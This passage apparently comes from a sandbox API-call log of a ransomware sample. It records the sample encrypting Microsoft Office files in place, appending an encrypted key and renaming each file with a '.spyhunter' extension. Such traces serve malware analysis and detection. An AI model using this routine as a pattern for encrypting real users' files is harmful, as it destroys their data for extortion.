hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c182d0 | out: hHeap=0x2c0000) returned 1 [0102.702] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8a0 | out: pbBuffer=0x270f8a0) returned 1 [0102.702] GetProcessHeap () returned 0x2c0000 [0102.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.702] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f898*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f898*=0x30) returned 1 [0102.702] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0103.243] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL") returned 71 [0103.243] StrStrW (lpFirst="OMSINTL.DLL.IDX_DLL", lpSrch=".txt") returned 0x0 [0103.243] GetProcessHeap () returned 0x2c0000 [0103.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0103.243] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f85c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f85c*=0x2800, lpOverlapped=0x0) returned 1 [0103.245] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.245] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f85c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f85c*=0x2800, lpOverlapped=0x0) returned 1 [0103.245] GetProcessHeap () returned 0x2c0000 [0103.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0103.245] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.245] WriteFile (in: hFile=0x158, lpBuffer=0x270f89c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f85c, lpOverlapped=0x0 | out: lpBuffer=0x270f89c*, lpNumberOfBytesWritten=0x270f85c*=0x4, lpOverlapped=0x0) returned 1 [0103.246] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f85c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f85c*=0x30, lpOverlapped=0x0) returned 1 [0103.246] CloseHandle (hObject=0x158) returned 1 [0103.247] GetProcessHeap () returned 0x2c0000 [0103.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0103.247] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL.spyhunter") returned 81 [0103.247] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll.idx_dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.IDX_DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll.idx_dll.spyhunter")) returned 1 [0103.248] GetProcessHeap () returned 0x2c0000 [0103.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0103.248] GetProcessHeap () returned 0x2c0000 [0103.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0103.248] GetProcessHeap () returned 0x2c0000 [0103.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf9a88 | out: hHeap=0x2c0000) returned 1 [0103.248] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f898 | out: pbBuffer=0x270f898) returned 1 [0103.248] GetProcessHeap () returned 0x2c0000 [0103.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0103.248] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f890*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f890*=0x30) returned 1 [0103.248] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0103.249] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK") returned 69 [0103.249] StrStrW (lpFirst="OUTLOOK_K_COL.HXK", lpSrch=".txt") returned 0x0 [0103.249] GetProcessHeap () returned 0x2c0000 [0103.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0103.249] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f854, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f854*=0x71, lpOverlapped=0x0) returned 1 [0103.252] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff8f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.252] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x71, lpNumberOfBytesWritten=0x270f854, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f854*=0x71, lpOverlapped=0x0) returned 1 [0103.252] GetProcessHeap () returned 0x2c0000 [0103.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0103.252] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.252] WriteFile (in: hFile=0x158, lpBuffer=0x270f894*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f854, lpOverlapped=0x0 | out: lpBuffer=0x270f894*, lpNumberOfBytesWritten=0x270f854*=0x4, lpOverlapped=0x0) returned 1 [0103.252] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f854, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f854*=0x30, lpOverlapped=0x0) returned 1 [0103.252] CloseHandle (hObject=0x158) returned 1 [0103.253] GetProcessHeap () returned 0x2c0000 [0103.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0103.253] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK.spyhunter") returned 79 [0103.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_k_col.hxk"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_K_COL.HXK.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_k_col.hxk.spyhunter")) returned 1 [0103.254] GetProcessHeap () returned 0x2c0000 [0103.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0103.254] GetProcessHeap () returned 0x2c0000 [0103.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0103.254] GetProcessHeap () returned 0x2c0000 [0103.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa070 | out: hHeap=0x2c0000) returned 1 [0103.254] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f898 | out: pbBuffer=0x270f898) returned 1 [0103.254] GetProcessHeap () returned 0x2c0000 [0103.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0103.254] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f890*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f890*=0x30) returned 1 [0103.254] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0103.255] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK") returned 69 [0103.255] StrStrW (lpFirst="OUTLOOK_F_COL.HXK", lpSrch=".txt") returned 0x0 [0103.255] GetProcessHeap () returned 0x2c0000 [0103.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0103.255] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f854, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f854*=0x72, lpOverlapped=0x0) returned 1 [0103.256] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff8e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.256] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x72, lpNumberOfBytesWritten=0x270f854, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f854*=0x72, lpOverlapped=0x0) returned 1 [0103.256] GetProcessHeap () returned 0x2c0000 [0103.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0103.256] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.256] WriteFile (in: hFile=0x158, lpBuffer=0x270f894*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f854, lpOverlapped=0x0 | out: lpBuffer=0x270f894*, lpNumberOfBytesWritten=0x270f854*=0x4, lpOverlapped=0x0) returned 1 [0103.256] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f854, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f854*=0x30, lpOverlapped=0x0) returned 1 [0103.256] CloseHandle (hObject=0x158) returned 1 [0103.257] GetProcessHeap () returned 0x2c0000 [0103.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0103.257] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK.spyhunter") returned 79 [0103.257] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_f_col.hxk"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_F_COL.HXK.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_f_col.hxk.spyhunter")) returned 1 [0103.257] GetProcessHeap () returned 0x2c0000 [0103.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0103.258] GetProcessHeap () returned 0x2c0000 [0103.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0103.258] GetProcessHeap () returned 0x2c0000 [0103.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf9f98 | out: hHeap=0x2c0000) returned 1 [0103.258] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f890 | out: pbBuffer=0x270f890) returned 1 [0103.258] GetProcessHeap () returned 0x2c0000 [0103.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0103.258] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f888*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f888*=0x30) returned 1 [0103.258] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0103.259] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT") returned 67 [0103.259] StrStrW (lpFirst="OUTLOOK_COL.HXT", lpSrch=".txt") returned 0x0 [0103.259] GetProcessHeap () returned 0x2c0000 [0103.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0103.259] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f84c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f84c*=0xcf, lpOverlapped=0x0) returned 1 [0103.260] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.260] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x270f84c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f84c*=0xcf, lpOverlapped=0x0) returned 1 [0103.260] GetProcessHeap () returned 0x2c0000 [0103.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0103.260] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.260] WriteFile (in: hFile=0x158, lpBuffer=0x270f88c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f84c, lpOverlapped=0x0 | out: lpBuffer=0x270f88c*, lpNumberOfBytesWritten=0x270f84c*=0x4, lpOverlapped=0x0) returned 1 [0103.260] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f84c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f84c*=0x30, lpOverlapped=0x0) returned 1 [0103.260] CloseHandle (hObject=0x158) returned 1 [0103.260] GetProcessHeap () returned 0x2c0000 [0103.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0103.261] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT.spyhunter") returned 77 [0103.261] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxt"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxt.spyhunter")) returned 1 [0103.261] GetProcessHeap () returned 0x2c0000 [0103.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0103.262] GetProcessHeap () returned 0x2c0000 [0103.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0103.262] GetProcessHeap () returned 0x2c0000 [0103.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca83a8 | out: hHeap=0x2c0000) returned 1 [0103.262] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f890 | out: pbBuffer=0x270f890) returned 1 [0103.262] GetProcessHeap () returned 0x2c0000 [0103.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0103.262] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f888*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f888*=0x30) returned 1 [0103.262] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0103.262] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC") returned 67 [0103.263] StrStrW (lpFirst="OUTLOOK_COL.HXC", lpSrch=".txt") returned 0x0 [0103.263] GetProcessHeap () returned 0x2c0000 [0103.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0103.263] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f84c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f84c*=0x277, lpOverlapped=0x0) returned 1 [0103.274] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffd89, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.274] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x270f84c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f84c*=0x277, lpOverlapped=0x0) returned 1 [0103.274] GetProcessHeap () returned 0x2c0000 [0103.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0103.274] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.274] WriteFile (in: hFile=0x158, lpBuffer=0x270f88c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f84c, lpOverlapped=0x0 | out: lpBuffer=0x270f88c*, lpNumberOfBytesWritten=0x270f84c*=0x4, lpOverlapped=0x0) returned 1 [0103.274] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f84c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f84c*=0x30, lpOverlapped=0x0) returned 1 [0103.275] CloseHandle (hObject=0x158) returned 1 [0103.337] GetProcessHeap () returned 0x2c0000 [0103.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0103.337] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC.spyhunter") returned 77 [0103.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxc"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxc.spyhunter")) returned 1 [0103.375] GetProcessHeap () returned 0x2c0000 [0103.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0103.375] GetProcessHeap () returned 0x2c0000 [0103.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0103.375] GetProcessHeap () returned 0x2c0000 [0103.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca82d8 | out: hHeap=0x2c0000) returned 1 [0103.375] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f888 | out: pbBuffer=0x270f888) returned 1 [0103.375] GetProcessHeap () returned 0x2c0000 [0103.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0103.375] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f880*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f880*=0x30) returned 1 [0103.375] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0103.376] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL") returned 64 [0103.376] StrStrW (lpFirst="PUB6INTL.DLL", lpSrch=".txt") returned 0x0 [0103.376] GetProcessHeap () returned 0x2c0000 [0103.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0103.376] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f844, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f844*=0x2800, lpOverlapped=0x0) returned 1 [0103.759] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.759] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f844, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f844*=0x2800, lpOverlapped=0x0) returned 1 [0103.759] GetProcessHeap () returned 0x2c0000 [0103.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0103.759] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.759] WriteFile (in: hFile=0x16c, lpBuffer=0x270f884*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f844, lpOverlapped=0x0 | out: lpBuffer=0x270f884*, lpNumberOfBytesWritten=0x270f844*=0x4, lpOverlapped=0x0) returned 1 [0104.299] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f844, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f844*=0x30, lpOverlapped=0x0) returned 1 [0104.299] CloseHandle (hObject=0x16c) returned 1 [0104.300] GetProcessHeap () returned 0x2c0000 [0104.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0104.300] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.spyhunter") returned 74 [0104.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll.spyhunter")) returned 1 [0104.302] GetProcessHeap () returned 0x2c0000 [0104.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0104.302] GetProcessHeap () returned 0x2c0000 [0104.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0104.302] GetProcessHeap () returned 0x2c0000 [0104.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca90a8 | out: hHeap=0x2c0000) returned 1 [0104.303] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f888 | out: pbBuffer=0x270f888) returned 1 [0104.303] GetProcessHeap () returned 0x2c0000 [0104.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0104.303] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f880*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f880*=0x30) returned 1 [0104.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\bdcmetadata.xsd" (normalized: "c:\\program files\\microsoft office\\office14\\bdcmetadata.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0104.315] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\bdcmetadata.xsd") returned 62 [0104.315] StrStrW (lpFirst="bdcmetadata.xsd", lpSrch=".txt") returned 0x0 [0104.315] GetProcessHeap () returned 0x2c0000 [0104.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0104.315] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f844, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f844*=0x2800, lpOverlapped=0x0) returned 1 [0104.508] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.508] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f844, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f844*=0x2800, lpOverlapped=0x0) returned 